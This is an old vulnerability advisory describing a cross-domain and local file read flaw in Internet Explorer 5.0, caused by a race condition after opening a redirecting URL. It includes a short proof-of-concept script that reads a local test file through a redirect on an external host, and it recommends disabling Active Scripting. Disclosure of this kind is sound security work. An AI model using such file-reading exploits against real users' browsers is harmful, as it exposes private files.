COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 5.0

PROBLEM

    Georgi  Guninski  found  following.   Internet  Explorer 5.0 under
    Windows 95 and NT 4.0 (suppose Win98 is vulnerable) allows reading
    local text  and HTML  files and  files from  any domain  (probably
    reading  files  of  other  types  of  files  is possible).  Window
    spoofing is possible.  It is  also possible in some cases to  read
    files behind fiewall.   This vulnerability may be  exploited using
    HTML email message or a newsgroup posting.

    The problem is something like a race condition immediately after

        window.open("HTTP-redirecting-URL")

    If you do:

        a=window.open("HTTP-redirecting-url");
        b=a.document;

    then you have access to  the redirected URL's document using  "b".
    The code is:

    <SCRIPT>
    alert("Create short text file c:\\test.txt and it will be read and shown in a message box");
    a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
    b=a.document;
    setTimeout("alert(b.body.innerText);",4000);
    </SCRIPT>
    // "http://www.nat.bg/~joro/reject.cgi?test.txt" just does a HTTP redirect to: "file://c:/test.txt"

    Demonstration is available at

        http://www.nat.bg/~joro/msredir1.html

    Credit  goes  to  Shane  Hird  from  Australia  for helping Georgi
    discover this vulnerability.

SOLUTION

    Disable Active Scripting.